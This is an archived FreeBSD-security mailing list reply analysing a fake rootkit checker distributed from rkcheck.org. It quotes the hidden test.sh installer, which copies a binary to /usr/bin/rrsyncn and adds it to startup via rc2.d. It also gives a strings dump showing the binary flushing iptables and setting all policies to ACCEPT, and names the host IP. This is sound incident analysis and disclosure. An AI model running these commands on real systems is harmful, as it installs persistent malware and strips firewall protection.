Date: Wed, 25 Feb 2015 22:04:46 +0100 From: Philip Jocks <pjlists@netzkommune.com> To: "freebsd-security@freebsd.org" <freebsd-security@freebsd.org> Cc: Joseph Mingrone <jrm@ftfl.ca> Subject: Re: has my 10.1-RELEASE system been compromised Message-ID: <5FCD7882-9BED-4101-9722-D174AC5347E3@netzkommune.com> In-Reply-To: <30A97E9B-5719-4DA3-ADFB-24A3FADF6D3C@schulte.org> References: <864mq9zsmm.fsf@gly.ftfl.ca> <54EE2A19.7050108@FreeBSD.org> <86vbipycyc.fsf@gly.ftfl.ca> <1B20A559-59C5-477A-A2F3-9FD7E16C09E8@netzkommune.com> <86k2z5yc03.fsf@gly.ftfl.ca> <4EE57C1F-AB10-4BF1-A193-DB9C75A586FC@netzkommune.com> <30A97E9B-5719-4DA3-ADFB-24A3FADF6D3C@schulte.org>
next in thread | previous in thread | raw e-mail | index | archive | help
> Am 25.02.2015 um 21:55 schrieb Christopher Schulte = <christopher@schulte.org>: >=20 >=20 >> On Feb 25, 2015, at 2:34 PM, Philip Jocks <pjlists@netzkommune.com> = wrote: >>=20 >> it felt pretty scammy to me, googling for the "worm" got me to = rkcheck.org which was registered a few days ago and looks like a = tampered version of chkrootkit. I hope, nobody installed it anywhere, it = seems to execute rkcheck/tests/.unit/test.sh which contains=20 >>=20 >> #!/bin/bash >>=20 >> cp tests/.unit/test /usr/bin/rrsyncn >> chmod +x /usr/bin/rrsyncn >> rm -fr /etc/rc2.d/S98rsyncn >> ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn >> /usr/bin/rrsyncn >> exit >>=20 >> That doesn't look like something you'd want on your box=E2=80=A6 >=20 > I filed a report with Google about that domain (Google Safe Browsing), = briefly describing what=E2=80=99s been recounted here on this thread. = It seems quite suspicious, agreed. >=20 > Has anyone started an analysis of the rrsyncn binary? The last few = lines of a simple string dump are interesting=E2=80=A6 take note what = looks to be an IP address of 95.215.44.195. >=20 > /bin/sh > iptables -X 2> /dev/null > iptables -F 2> /dev/null > iptables -t nat -F 2> /dev/null > iptables -t nat -X 2> /dev/null > iptables -t mangle -F 2> /dev/null > iptables -t mangle -X 2> /dev/null > iptables -P INPUT ACCEPT 2> /dev/null > iptables -P FORWARD ACCEPT 2> /dev/null > iptables -P OUTPUT ACCEPT 2> /dev/null > udevd > 95.215.44.195 > ;*3$" 95.215.44.195 is the IP of rkcheck.org. I contacted the yourserver.se = who own the network. Philip
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?5FCD7882-9BED-4101-9722-D174AC5347E3>